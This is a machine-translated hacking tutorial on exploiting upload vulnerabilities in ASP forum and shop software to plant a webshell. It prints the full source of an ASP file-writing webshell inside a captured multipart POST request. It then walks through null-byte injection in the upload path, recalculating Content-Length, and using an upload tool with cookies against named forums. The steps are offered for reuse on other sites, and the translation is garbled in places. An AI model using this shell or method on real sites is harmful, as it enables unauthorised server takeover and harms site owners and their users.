Instance analysis asp upload vulnerability intrusion practices and extensions

[Upload Vulnerability spoofing technology]

ManyProgramAll have upload vulnerabilities, such as the whole station program, dynamic shopping mall, qiuye Mall, huixin news system, etc. This article mainly describes the Upload Vulnerability intrusion practices and some extensions. First, we need to obtain the data transmitted between the client and the server, and prepare an ASP trojan in advance to prepare the upload. Of course, it is impossible to succeed. What we need is the data we submit to the server in the middle. Generally, wsockexpert is used to obtain data. Because there is too much data, the key part can only be sent out as follows:

Post/BBS/upfile. asp HTTP/1.1

....... N is omitted. N is useless.

Content-Length: 1792
Connection: keep-alive
Cache-control: No-Cache
COOKIE: aspsessionidqqtdtatd = nldnnhpdjeehofnfbagpojkn
----------------------------- 7d52191850242
Content-Disposition: Form-data; name = "filepath"

Uploadface
----------------------------- 7d52191850242
Content-Disposition: Form-data; name = "act"

Upload
----------------------------- 7d52191850242
Content-Disposition: Form-data; name = "file1"; filename = "E: \ trojan \ ASP \ shell. asp"
Content-Type: text/plain

<% Dim objfso %>
<% Dim fdata %>
<% Dim objcountfile %>
<% On error resume next %>
<% Set objfso = server. Create Object ("Scripting. filesystem Object ") %>
<% If trim (Request ("syfdpath") <> "" Then %>
<% Fdata = request ("cyfddata") %>
<% Set objcountfile = objfso. createtextfile (Request ("syfdpath"), true) %>
<% Objcountfile. Write fdata %>
<% If err = 0 then %>
<% Response. Write "<font color = Red> <H2> successful! </H2> <font> "%>
<% Else %>
<% Response. Write "<font color = Red> <% End if %>
<% Err. Clear %>
<% End if %>
<% Objcountfile. Close %>
<% Set objcountfile = nothing %>
<% Set objfso = nothing %>
<% Response. Write "<form action = ''' method = post>" %>
<% Response. Write "Save the message <font color = Red> For example, D: \ WEB \ x. asp </font>" %>
<% Response. Write "<input type = text name = syfdpath width = 32 size = 50>" %>
<% Response. Write "<br>" %>
<% Response. Write "address from" %>
<% = Server. mappath (request. servervariables ("script_name") %>
<% Response. Write "<br>" %>
<% Response. Write "your message:" %>
<% Response. Write "<textarea name = cyfddata Cols = 80 rows = 10 width = 32> </textarea>" %>
<% Response. Write "<input type = submit value = sky!> "%>
<% Response. Write "</form>" %>

----------------------------- 7d52191850242
Content-Disposition: Form-data; name = "fname"

E: \ trojan \ ASP \ shell. asp
----------------------------- 7d52191850242
Content-Disposition: Form-data; name = "Submit"

Upload
----------------------------- 7d52191850242 --

We have obtained the passed information. Next we will modify it to achieve the goal of deception. The main changes are as follows:

1. Content-Disposition: Form-data; name = "file1"; filename = "E: \ trojan \ ASP \ shell. asp"

2. Content-Disposition: Form-data; name = "fname"

E: \ trojan \ ASP \ shell. asp

3. The most important thing is to modify the values below content-Disposition: Form-data; name = "filepath. How can we add an empty character after uploadface \ shell. asp? Using ultraedit is a good method. It can be edited in hexadecimal notation (because the character ''\ 0'' occupies a position, we should enter a space first, then, in ultraedit (convert Ctrl + H to hexadecimal mode), 20 of the space character is changed to 00 ).

4. Modify the Content-Length: 1792 to indicate the number of characters in the submitted data.

If you modify the filepath value, the length of 1792 must be changed. The length of a letter or number is 1. Do not forget that the space at the end is also 1.

[Upload Vulnerability practices]

We will first use the originator of the vulnerability online forum for actual practice. From the principle, we can see that the data needs to be modified and the package needs to be cut during the upload, so many tools are available on the Internet. Now we can simply use the upload tool of veterans to simplify the complex steps. We only need to modify a few pieces of data. Let's take a look at the interface of this tool, such as 1:

Figure 1 veterans upload tool interface

Let's take a look at the usage of the tool:

In the action field, enter the URL of the vulnerability file: Upload (generally, the website allows you to upload jpg image files). In the first text box in the file, file1 is the file 1 in the form, fill in the Trojan path to be uploaded on the local machine after the equal sign. Fill in cookies with the cookies that we use to capture data packets, such as the cookies captured by wsockexpert. Remember that it is best to register the cookies in the system.

Here we take the intrusion into the dynamic network forum as an example. Here, Action: Fill in http: // www. ***. COM/BBS/upfile. ASP; fill in filepath In the first text box of uppath; fill in/shell in the second text box. ASP (you can also write/BBS/shell. ASP uploads the files to the/BBS directory !) Enter a default JPG file in the type text box that the web program can upload. Enter file1 In the first text box of file, and enter E: \ trojan \ ASP \ shell in the second text box. ASP (this ASP Trojan is the path on your machine. Click the open icon next to the file to browse and find the ASP Trojan .)

Cookies: you do not need to capture packets here, because uploading does not detect cookies at all. If not, an error will be reported. If they are all filled in, press "Submit" to submit them!

Figure 2 upload success prompt

When you click the submit button, it is recommended that you use your browser to access it, and the program will report a false positive. We use a browser to access.

Figure 3 shows that the upload is successful.

The next step is to write a powerful Trojan to operate it.

[Practical expansion of upload vulnerabilities]

Not only does the mobile network have the upload vulnerability, but many programs on the network have this vulnerability. The Upload Vulnerability works in the same way. After mastering the vulnerability, you can use it as needed.Code. Next we will take the qiaoke Forum as an example to expand the application of the Upload Vulnerability.
First, register a normal user and log on, and find the upload page address: http: // 192.168.1.3/3/upload. asp? Uppath = Forum & upname = & uptext = jk_word view the source code as follows:
--------------------------------------------------------------------------------

<Form name = form1 action =? Action = upfile method = post enctype = multipart/form-data>
<Input type = hidden value = Forum name = up_path>
<Input type = hidden value = 200593075710 name = up_name>
<Input type = hidden value = jk_word name = up_text>
<Input type = file size = 40 name = file_name1>
<Input type = submit value = click to upload name = submit>

--------------------------------------------------------------------------------

SeeSource codeThen we should know how to fill in the veteran upload tool.
In the action, enter http: // 192.168.1.3/3/upload. asp? Action = upfile uppath input in the first text box: up_name; the second input the uploaded Shell Name shell. asp; file input file_name1 In the first text box, the second is the local Trojan file. Here, fill in the cookie value obtained from packet capture. Be sure to fill in the cookie information captured by wsockexpert. Its main function is to verify it!

Figure 4 settings

After setting all the settings, click the submit button to see that the upload is successful. Open your browser and check whether the upload is successful,

Figure 5 uploaded successfully

webshell has been successfully obtained, which is so simple. It is important that we have a flexible approach and be good at discovering whether a system has an upload vulnerability. Of course, what can you do after getting webshell? It depends on the security configuration of the server and your personal level. We will not discuss it here.